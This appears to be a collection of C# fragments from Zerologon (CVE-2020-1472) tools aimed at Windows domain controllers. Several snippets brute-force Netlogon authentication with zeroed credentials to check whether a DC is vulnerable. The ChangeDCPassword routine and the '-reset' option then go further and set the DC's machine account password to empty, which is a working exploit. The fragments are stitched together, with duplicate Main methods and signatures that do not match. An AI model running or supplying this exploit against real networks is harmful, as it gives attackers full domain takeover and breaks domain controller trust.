protected override string GetCsvData(string computer)
{
int NegotiateFlags = 0x212fffff;
int ServerSecureChannel = 6;
int r = 0;
for (int i = 0; i < 2000; i++)
{
var Input = new NETLOGON_CREDENTIAL();
Input.data = new byte[8];
var LazyOutput = new NETLOGON_CREDENTIAL();
LazyOutput.data = new byte[8];
string dcname = computer.Split('.')[0];
r = I_NetServerReqChallenge(computer, dcname, ref Input, out LazyOutput);
if (r != 0)
{
return(computer + "\t" + "Error 1: " + r.ToString("x"));
}
r = I_NetServerAuthenticate2(computer, dcname + "$", ServerSecureChannel, dcname, ref Input, out LazyOutput, ref NegotiateFlags);
if (r == 0)
{
return(computer + "\t" + "Vulnerable after " + i + " attempts");
}
else if ((uint)r != 0xc0000022)
{
return(computer + "\t" + "Error 3: " + r.ToString("x"));
}
}
return(computer + "\t" + "Error 2: " + r.ToString("x"));
}
public static extern int I_NetServerAuthenticate2(
string PrimaryName,
string AccountName,
NETLOGON_SECURE_CHANNEL_TYPE AccountType,
string ComputerName,
ref NETLOGON_CREDENTIAL ClientCredential,
ref NETLOGON_CREDENTIAL ServerCredential,
ref ulong NegotiateFlags
);
private static Natives.NTSTATUS ChangeDCPassword(string targetcomputeraccount)
{
byte[] plaintext = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
byte[] ciphertext = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
NETLOGON_CREDENTIAL palintextcred = new NETLOGON_CREDENTIAL
{
data = plaintext
};
NETLOGON_CREDENTIAL chiphertextcred = new NETLOGON_CREDENTIAL
{
data = ciphertext
};
NETLOGON_AUTHENTICATOR plainAuth = new NETLOGON_AUTHENTICATOR
{
Credential = palintextcred,
Timestamp = 0
};
NETLOGON_AUTHENTICATOR cipherAuth = new NETLOGON_AUTHENTICATOR
{
Credential = chiphertextcred,
Timestamp = 0
};
IntPtr pcred = Marshal.AllocHGlobal(Marshal.SizeOf(plainAuth));
Marshal.StructureToPtr(plainAuth, pcred, false);
IntPtr ccred = Marshal.AllocHGlobal(Marshal.SizeOf(cipherAuth));
Marshal.StructureToPtr(cipherAuth, ccred, false);
IntPtr computernamePtr = Marshal.StringToHGlobalUni("Neverland");
IntPtr targetcomputeraccountPtr = Marshal.StringToHGlobalUni(targetcomputeraccount);
NL_TRUST_PASSWORD tpass = new NL_TRUST_PASSWORD();
IntPtr ptpass = Marshal.AllocHGlobal(Marshal.SizeOf(tpass));
Marshal.StructureToPtr(tpass, ptpass, false);
NTSTATUS rpcStatus = (NTSTATUS)NetServerPasswordSet2(GetStubPtr(), GetProcStringPtr(142), IntPtr.Zero, targetcomputeraccountPtr, NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, computernamePtr, pcred, ccred, ptpass);
return((NTSTATUS)rpcStatus);
}
private static bool Tryzerologonenticate(string targetcomputeraccount)
{
byte[] plaintext = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
byte[] ciphertext = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
NETLOGON_CREDENTIAL palintextcred = new NETLOGON_CREDENTIAL();
palintextcred.data = plaintext;
NETLOGON_CREDENTIAL chiphertextcred = new NETLOGON_CREDENTIAL();
chiphertextcred.data = ciphertext;
IntPtr pcred = Marshal.AllocHGlobal(Marshal.SizeOf(palintextcred));
Marshal.StructureToPtr(palintextcred, pcred, false);
uint flags = 0x212fffff;
IntPtr computernamePtr = Marshal.StringToHGlobalUni("Neverland");
IntPtr targetcomputeraccountPtr = Marshal.StringToHGlobalUni(targetcomputeraccount);
NTSTATUS rpcStatus = (NTSTATUS)NetrServerReqChallenge(GetStubPtr(), GetProcStringPtr(0), IntPtr.Zero, computernamePtr, pcred, out chiphertextcred);
uint rid = 0;
try
{
rpcStatus = (NTSTATUS)NetrServerAuthenticate3(GetStubPtr(), GetProcStringPtr(62), IntPtr.Zero, targetcomputeraccountPtr, NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, computernamePtr, pcred, out chiphertextcred, out flags, out rid);
if (rpcStatus == NTSTATUS.Success)
{
Console.WriteLine("\n[*]");
return(true);
}
}
catch (Exception e)
{
if (rpcStatus != NTSTATUS.AccessDenied)
{
Console.WriteLine("Error: " + e.Message);
}
}
return(false);
}
internal static extern int I_NetServerAuthenticate2(string domain, string account, int SecureChannelType, string computername, ref NETLOGON_CREDENTIAL ClientCredential, out NETLOGON_CREDENTIAL ServerCredential, ref int NegotiateFlags);
internal static extern int I_NetServerReqChallenge(string domain, string computer, ref NETLOGON_CREDENTIAL ClientChallenge, out NETLOGON_CREDENTIAL ServerChallenge);
/// <summary>
///
/// </summary>
/// <param name="args"></param>
static void Main(string[] args)
{
recap();
string Remote_Host = args[0];
while (!Remote_Host.Contains("."))
{
Console.WriteLine("[-] Please provide FQDN :");
Remote_Host = Console.ReadLine();
Console.Clear();
}
string Remote_HostName = args[0].Split('.')[0];
NETLOGON_CREDENTIAL ClientChallenge = new NETLOGON_CREDENTIAL();
NETLOGON_CREDENTIAL ServerChallenge = new NETLOGON_CREDENTIAL();
ulong NegotiateFlags = 0x212fffff;
Console.WriteLine("[+] Begining auth attempts...");
Console.Write("[+] Working... ");
Console.CursorVisible = false;
int counter = 0;
Console.WriteLine("\n\n");
var currConsoleColor = Console.ForegroundColor;
for (int i = 0; i < 2000; i++)
{
counter++;
switch (counter % 4)
{
case 0: Console.Write(" /"); counter = 0; break;
case 1: Console.Write(" -"); break;
case 2: Console.Write(" \\"); break;
case 3: Console.Write(" |"); break;
}
Console.SetCursorPosition(Console.CursorLeft - 2, Console.CursorTop);
if (I_NetServerReqChallenge(Remote_Host, Remote_HostName, ref ClientChallenge, ref ServerChallenge) != 0)
{
Console.WriteLine("[-] Could not complete server challenge. Could be invalid name provided or network issues\n");
return;
}
if (I_NetServerAuthenticate2(Remote_Host, Remote_HostName + "$", NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
Remote_HostName, ref ClientChallenge, ref ServerChallenge, ref NegotiateFlags) == 0)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[+] DC is vulnerable to Zerologon attack.\n");
Console.ForegroundColor = currConsoleColor;
return;
}
}
Console.CursorVisible = true;
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("[+] DC appear to not be vulnerable to Zerologon attack.\n");
Console.ForegroundColor = currConsoleColor;
}
static void Main(string[] args)
{
if (args.Length < 1)
{
Console.WriteLine(" Usage: SharpZeroLogon.exe <target dc fqdn> <optional: -reset -patch>");
return;
}
bool reset = false;
bool patch = false;
string fqdn = args[0];
string hostname = fqdn.Split('.')[0];
foreach (string arg in args)
{
switch (arg)
{
case "-reset":
reset = true;
break;
case "-patch":
patch = true;
break;
}
}
if (patch)
{
if (!PatchLogon())
{
Console.WriteLine("Patching failed :(");
return;
}
Console.WriteLine("Patch successful. Will use ncacn_ip_tcp");
}
NETLOGON_CREDENTIAL ClientChallenge = new NETLOGON_CREDENTIAL();
NETLOGON_CREDENTIAL ServerChallenge = new NETLOGON_CREDENTIAL();
ulong NegotiateFlags = 0x212fffff;
Console.WriteLine("Performing authentication attempts...");
for (int i = 0; i < 2000; i++)
{
if (I_NetServerReqChallenge(fqdn, hostname, ref ClientChallenge, ref ServerChallenge) != 0)
{
Console.WriteLine("Unable to complete server challenge. Possible invalid name or network issues?");
return;
}
Console.Write("=");
if (I_NetServerAuthenticate2(fqdn, hostname + "$", NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
hostname, ref ClientChallenge, ref ServerChallenge, ref NegotiateFlags) == 0)
{
Console.WriteLine("\nSuccess! DC can be fully compromised by a Zerologon attack.");
NETLOGON_AUTHENTICATOR authenticator = new NETLOGON_AUTHENTICATOR();
NL_TRUST_PASSWORD ClearNewPassword = new NL_TRUST_PASSWORD();
if (reset)
{
if (I_NetServerPasswordSet2(
fqdn,
hostname + "$",
NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
hostname,
ref authenticator,
out _,
ref ClearNewPassword
) == 0)
{
Console.WriteLine("Done! Machine account password set to NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0");
return;
}
Console.WriteLine("Failed to reset machine account password");
}
return;
}
}
Console.WriteLine("\nAttack failed. Target is probably patched.");
}
public static extern int I_NetServerReqChallenge(
string PrimaryName,
string ComputerName,
ref NETLOGON_CREDENTIAL ClientChallenge,
ref NETLOGON_CREDENTIAL ServerChallenge
);
